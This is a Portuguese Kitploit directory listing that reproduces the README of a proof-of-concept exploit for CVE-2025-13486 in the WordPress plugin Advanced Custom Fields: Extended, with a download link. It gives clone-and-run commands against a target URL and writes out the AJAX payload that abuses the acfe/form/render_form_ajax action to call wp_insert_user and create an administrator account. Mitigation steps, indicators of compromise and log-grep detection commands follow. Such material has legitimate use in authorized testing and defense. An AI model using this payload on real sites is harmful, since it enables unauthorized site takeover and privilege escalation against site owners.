Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-13486 — Advanced Custom Fields Extended (ACFE) WordPress Plugin Exploit RCE - Criação de Administrador | Kitploit
Ferramentas/GitHubGitHub/0xgh057r3c0n/cve-2025-13486
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHub0xgh057r3c0n/cve-2025-13486

CVE-2025-13486

Advanced Custom Fields Extended (ACFE) WordPress Plugin Exploit RCE - Criação de Administrador

Ver Repositório
111há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🔴 CVE-2025-13486 - Exploração do Plugin WordPress Advanced Custom Fields Extended (ACFE)

WordPress Python License Status

Logotipo do WordPress

📋 Visão Geral

Exploit de prova de conceito para a CVE-2025-13486, uma vulnerabilidade crítica no plugin WordPress Advanced Custom Fields: Extended (ACFE) que permite a Execução Remota de Código (RCE) levando à Escalação de Privilégios.

🎯 Detalhes da Vulnerabilidade

AspectoDetalhes
CVE IDCVE-2025-13486
PluginAdvanced Custom Fields: Extended (ACFE)
TipoExecução Remota de Código → Escalação de Privilégios
Nível de RiscoCrítico
Versões AfetadasVersões vulneráveis do ACFE (versões específicas a determinar)
Pontuação CVSS9.8 CRÍTICO
Data de Descoberta2025
Autor0xgh057r3c0n

⚠️ AVISO DE USO ÉTICO

⚠️ AVISO: Esta ferramenta é apenas para testes de segurança autorizados e fins educacionais.

✅ Uso Permitido:

  • Pesquisa e educação em segurança
  • Testar seus próprios sistemas
  • Teste de penetração autorizado com permissão por escrito
  • Pesquisa acadêmica e ensino
  • Treinamento de conscientização em segurança

❌ Uso Proibido:

  • Testes não autorizados em sistemas que você não possui
  • Ataques maliciosos ou hacking
  • Quaisquer atividades ilegais
  • Violação de leis de fraude informática (CFAA, etc.)
  • Testes de segurança antiéticos

O autor não se responsabiliza por qualquer uso indevido desta ferramenta. Sempre obtenha autorização por escrito adequada antes de testar qualquer sistema.

🔧 Funcionalidades

🔍 Modo de Verificação

  • Extração de nonce de páginas WordPress
  • Confirmação de vulnerabilidade usando a função print_r
  • Verificação segura sem exploração
  • Correspondência de múltiplos padrões para detecção de nonce

⚡ Modo de Exploração

  • Criação de usuário administrativo via wp_insert_user
  • Credenciais personalizadas ou geradas aleatoriamente
  • Suporte para nomes de usuário, senhas e e-mails personalizados
  • Análise de resposta para indicadores de sucesso

🛠️ Funcionalidades Técnicas

  • Detecção automática de protocolo (HTTP/HTTPS)
  • Saída de terminal com código de cores
  • Bypass de verificação SSL para ambientes de teste
  • Relatórios de erro e depuração detalhados
  • Tratamento de tempo limite de sessão e conexão

📦 Instalação

Requisitos

  • Python 3.6+
  • Biblioteca requests

Configuração

root@kitploit:~
# Clone repository
git clone https://github.com/0xgh057r3c0n/CVE-2025-13486.git
cd CVE-2025-13486

# Install dependencies
pip install requests

# Alternative: Install from requirements.txt
pip install -r requirements.txt

# Make script executable (Linux/Mac)
chmod +x exploit.py

Dependências

Crie um arquivo requirements.txt:

root@kitploit:~
requests>=2.25.1

🚀 Uso

Sintaxe Básica

root@kitploit:~
python3 exploit.py --url <TARGET_URL> [OPTIONS]

Exemplos

1. Verificar Vulnerabilidade Apenas (Teste Seguro)

root@kitploit:~
python3 exploit.py --url http://target.com --verify

2. Explorar com Credenciais Aleatórias

root@kitploit:~
python3 exploit.py --url https://target.com

3. Explorar com Credenciais Personalizadas

root@kitploit:~
python3 exploit.py --url https://target.com \
  --user backup_admin \
  --password "P@ssw0rd123!" \
  --email [email protected]

4. Alvo sem Protocolo (Detecção Automática)

root@kitploit:~
python3 exploit.py --url target.com --verify

Opções da Linha de Comando

OpçãoDescriçãoObrigatórioPadrão
-u, --urlURL do WordPress alvoSim-
--verifyApenas verificar, sem exploraçãoNãoFalse
--userNome de usuário personalizado para adminNãoadmin_XXXXX
--passwordSenha personalizada para adminNão12 caracteres aleatórios
--emailE-mail personalizado para adminNão[email protected]

🧪 Como Funciona

1. Mecanismo da Vulnerabilidade

O exploit aproveita o tratamento inadequado de funções no endpoint acfe/form/render_form_ajax do plugin ACFE, permitindo que atacantes chamem funções PHP arbitrárias.

2. Fluxo Técnico

root@kitploit:~
1. URL Validation → Auto-detects HTTP/HTTPS
2. Nonce Extraction → Scans page for ACF nonce
3. Payload Construction → Builds malicious AJAX request
4. Request Execution → Sends exploit to target
5. Result Analysis → Checks for success indicators

3. Payload de Exploração

root@kitploit:~
// Vulnerable code pattern in ACFE
$result = call_user_func_array($form['render'], array($form));

// Exploit payload structure
{
    "action": "acfe/form/render_form_ajax",
    "nonce": "extracted_nonce",
    "form[render]": "wp_insert_user",
    "form[user_login]": "attacker_user",
    "form[user_pass]": "attacker_pass",
    "form[user_email]": "[email protected]",
    "form[role]": "administrator"
}

🛡️ Mitigação

Ações Imediatas

  1. Atualizar Plugin: Atualize imediatamente o plugin ACFE para a versão mais recente
  2. Remover Plugin: Se a atualização não estiver disponível, desative temporariamente o ACFE
  3. Firewall de Aplicação Web: Implemente regras de WAF para bloquear requisições maliciosas
  4. Monitoramento: Monitore a criação suspeita de usuários administradores

Reforço de Segurança WordPress

root@kitploit:~
# Recommended security plugins
1. Wordfence Security
2. Sucuri Security
3. iThemes Security
4. All In One WP Security

# Server-level protections
- Implement rate limiting
- Enable mod_security rules
- Use Cloudflare or similar CDN
- Regular security audits

🔍 Detecção

Indicadores de Comprometimento (IOCs)

  • Criação não autorizada de usuário administrador
  • Requisições AJAX suspeitas para /wp-admin/admin-ajax.php
  • Requisições com action=acfe/form/render_form_ajax
  • Chamadas inesperadas da função wp_insert_user via AJAX

Monitoramento de Logs

root@kitploit:~
# Apache logs
grep "admin-ajax.php" /var/log/apache2/access.log | grep "acfe/form"

# WordPress debug logs
define('WP_DEBUG', true);
define('WP_DEBUG_LOG', true);

📚 Referências

  1. Repositório de Plugins WordPress: Advanced Custom Fields: Extended
  2. Banco de Dados CVE: CVE-2025-13486
  3. Equipe de Segurança WordPress: Diretrizes de Segurança para Plugins
  4. OWASP Top 10: Ataques de Injeção

🤝 Contribuindo

  1. Faça um fork do repositório
  2. Crie um branch de funcionalidade (git checkout -b feature/improvement)
  3. Faça commit das alterações (git commit -am 'Add new feature')
  4. Envie para o branch (git push origin feature/improvement)
  5. Crie um Pull Request

Diretrizes para Contribuidores

  • Siga o guia de estilo Python PEP 8
  • Adicione comentários para lógica complexa
  • Inclua tratamento de erros
  • Atualize a documentação

🐛 Reportando Problemas

Por favor, reporte bugs e problemas através de:

  1. GitHub Issues: Criar Nova Issue
  2. Vulnerabilidades de Segurança: Divulgação responsável ao autor primeiro

📊 Estrutura do Projeto

root@kitploit:~
CVE-2025-13486/
├── exploit.py          # Main exploit script
├── README.md           # This documentation
├── requirements.txt    # Python dependencies
├── LICENSE            # MIT License file
├── examples/          # Usage examples
│   ├── verification.txt
│   └── exploitation.txt
└── tests/             # Test scripts
    ├── test_verify.py
    └── test_exploit.py

👨‍💻 Autor

0xgh057r3c0n - Pesquisador de Segurança

  • GitHub: @0xgh057r3c0n
  • Twitter: @0xgh057r3c0n

📜 Licença

Este projeto está licenciado sob a Licença MIT - veja o arquivo LICENSE para detalhes.

Construído com ❤️ para a comunidade de segurança
⚠️ Use de forma responsável e ética ⚠️

Baixar ferramenta